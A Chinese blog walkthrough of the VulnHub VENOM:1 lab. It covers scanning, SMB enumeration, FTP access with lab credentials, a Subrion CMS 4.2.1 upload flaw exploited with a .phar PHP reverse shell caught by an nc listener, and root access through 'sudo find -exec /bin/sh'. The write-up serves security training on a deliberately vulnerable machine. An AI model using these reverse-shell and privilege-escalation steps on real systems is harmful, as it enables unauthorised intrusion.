vulnhub之VENOM:1

1.信息收集

输入arp-scan 192.168.239.0/24探测存活的IP
在这里插入图片描述
使用nmap对192.168.239.166进行扫描,发现IP端口21、80、139、443、445。
在这里插入图片描述
在浏览器上访问http://192.168.239.166/,查看源码发现类似md5加密。
在这里插入图片描述
解密md5可以得到为hostinger。
在这里插入图片描述
输入enum4linux 192.168.239.166,进行SMB探测,可发现存在nathan、hostinger两个用户。
在这里插入图片描述
使用上述两个用户登录ftp,发现hostinger\hostinger可以登录成功,并发现存在hint.txt文件。
![在这里插入图片描述](https://img-blog.csdnimg.cn/8951d983e5894230a6991c33b2bcf
使用get hint.txt下载文件,并查看文件可得用户名为dora
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

解密可知为:E7r9t8@Q#h%Hy+M1234在这里插入图片描述

2.漏洞利用

将venom.box加入/etc/hosts文件中,并访问http://venom.box/panel/,发现为Subrion CMS v4.2.1。
在这里插入图片描述
使用searchsploit Subrion CMS搜索发现存在文件上传漏洞
在这里插入图片描述
上网查询,可以看到Subrion CMS 4.2.1的上传漏洞为,后缀名可以是phar或pht。

并输入用户名\密码,dora\E7r9t8@Q#h%Hy+M1234登录成功,并上传自己木马。
在这里插入图片描述
本地监听nc -lvvp 1234,浏览器访问:http://venom.box/upload/php-reverse-shell.phar,反弹成功。
在这里插入图片描述

3.权限提升

切换用户为:hostinger
在这里插入图片描述
查看hostinger用户目录下无有用信息。
在这里插入图片描述
查看/var/www/html/subrion/backup,下存在.htaccess文件,打开发现类似于密码。
在这里插入图片描述
切换nathan用户,发现存在sudo提权,但禁止了su。
在这里插入图片描述
执行sudo id发现提权成功。
在这里插入图片描述
执行find / -perm -u=s -type f 2>/dev/null,发现存在SUID,find提权。
在这里插入图片描述
执行sudo find . -exec /bin/sh ; -quit,提权成功。
在这里插入图片描述

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值